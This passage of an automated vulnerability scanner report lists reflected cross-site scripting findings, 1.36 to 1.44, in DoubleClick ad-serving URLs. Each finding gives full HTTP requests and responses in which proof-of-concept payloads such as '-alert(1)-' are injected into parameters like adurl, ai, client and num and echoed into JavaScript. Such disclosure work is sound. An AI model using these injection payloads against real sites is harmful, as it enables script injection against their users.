GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7857
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:58 GMT
Expires: Thu, 03 Feb 2011 16:08:58 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:38:57 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Qe4ef6"-alert(1)-"6c82ad39022&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865897%3B39213497");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

The report files this reflection under the sz request parameter, but in the request below the payload b4c51'-alert(1)-'a046432a509 is appended to the sa=l value at the head of the click= URL, while sz itself is still 160x600; the label reflects how the scanner tokenised the semicolon-delimited /adj path, not where the payload sits. The injected value is copied into a JavaScript string which is encapsulated in single quotation marks (the href=\"...\" attribute inside the document.write('...') call in the response excerpt) and was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:53 GMT
Expires: Thu, 03 Feb 2011 16:08:53 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k\" href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=lb4c51'-alert(1)-'a046432a509&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.16

Issue detail

As in 1.36, the report files this reflection under the sz request parameter, but in the request below the payload 95ce4"-alert(1)-"4bb60c57e4a is appended to the sa=l value at the head of the click= URL, while sz itself is still 160x600; the label reflects how the scanner tokenised the semicolon-delimited /adj path. The injected value is copied into a JavaScript string which is encapsulated in double quotation marks (the escape("...") call in the response excerpt) and was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.16;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2NtLnNwJnBvcz0zJnQ9MyZzej0xNjB4NjAwJm9yZD0xMjk2NzQ4ODEyNjM4Jms9YmFua3MmbD1EYWxsYXMlMkMrVFgmY2F0PWNhdCUzRGZpbmFuY2lhbF9zZXJ2aWNlcyZ6b25lPWxvY20uc3AlMkZyZXRhaWxfYmFua3NfMTUwMjAxMDC4AhjIAoWZ-heoAwHRA_lxBfrEOYUM9QMAAADEyAQB&num=1&sig=AGiWqtx7G7yGna9z3i0aQ_yvMAMz89tx4Q&client=ca-pub-4103679352234073&adurl=;ord=1145778283?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7891
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:08:53 GMT
Expires: Thu, 03 Feb 2011 16:08:53 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:24:09 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
= escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aa3/f/23c/%2a/k%3B234019457%3B1-0%3B0%3B57865897%3B2321-160/600%3B40155604/40173391/4%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l95ce4"-alert(1)-"4bb60c57e4a&ai=B4dkh_tBKTeXpApv7lQey2KGoDp3vkP4B5YTfuyHAjbcBoPPbAhABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQoxNjB4NjAwX2FzyAEJ2gGsAWh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmcD1sb2Nt
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d464"-alert(1)-"0d57c46e691 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7515
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:25 GMT
Expires: Thu, 03 Feb 2011 16:06:25 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=9d464"-alert(1)-"0d57c46e691https://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;40155598");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e8b'-alert(1)-'ba15f59f95e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7481
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:06:29 GMT
Expires: Thu, 03 Feb 2011 16:06:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
D0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=c3e8b'-alert(1)-'ba15f59f95ehttps://www.ally.com/bank/interest-checking-account/index.html?CP=57865904;39213496\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8ab'-alert(1)-'2e90ecc46ed was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAEde8ab'-alert(1)-'2e90ecc46ed&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496\">
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62261"-alert(1)-"0f904a05a8a was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:04:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
UwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE62261"-alert(1)-"0f904a05a8a&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598");
var fscUrl = url;
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cad'-alert(1)-'9a787db18eb was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:06:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 15:27:23 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407373cad'-alert(1)-'9a787db18eb&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B40155598\">
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97bde"-alert(1)-"10744de2739 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 03 Feb 2011 16:06:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7517

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Feb 02 16:39:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-410367935223407397bde"-alert(1)-"10744de2739&adurl=https%3a%2f%2fwww.ally.com/bank/interest-checking-account/index.html%3FCP%3D57865904%3B39213496");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5776.google.comOX2416/B5111410.18

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1b11"-alert(1)-"fc5636c00ac was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5776.google.comOX2416/B5111410.18;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BQahWStFKTfOlEJnPlQeJvtnTDp3vkP4BldLeuyHAjbcBgIWfAxABGAEgqvaFGDgAUJCnm70BYMm-somQpNARoAHro6faA7IBDXd3dy5sb2NhbC5jb226AQozMDB4MjUwX2FzyAEJ2gFqaHR0cDovL3d3dy5sb2NhbC5jb20vZGFydC8_YWc9VHJ1ZSZwPWxvY20ucHAmcG9zPTImdD0yJnN6PTMwMHgyNTAmb3JkPTEyOTY3NDg4NzAyNzMmaz1iYW5rcyZsPURhbGxhcyUyQytUWOABA7gCGMgChZn6F6gDAdED-XEF-sQ5hQz1AwAAAMTIBAE&num=1c1b11"-alert(1)-"fc5636c00ac&sig=AGiWqtwDn9xa90_LyfQQgZfcngpD0pdWtw&client=ca-pub-4103679352234073&adurl=;ord=1257048341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
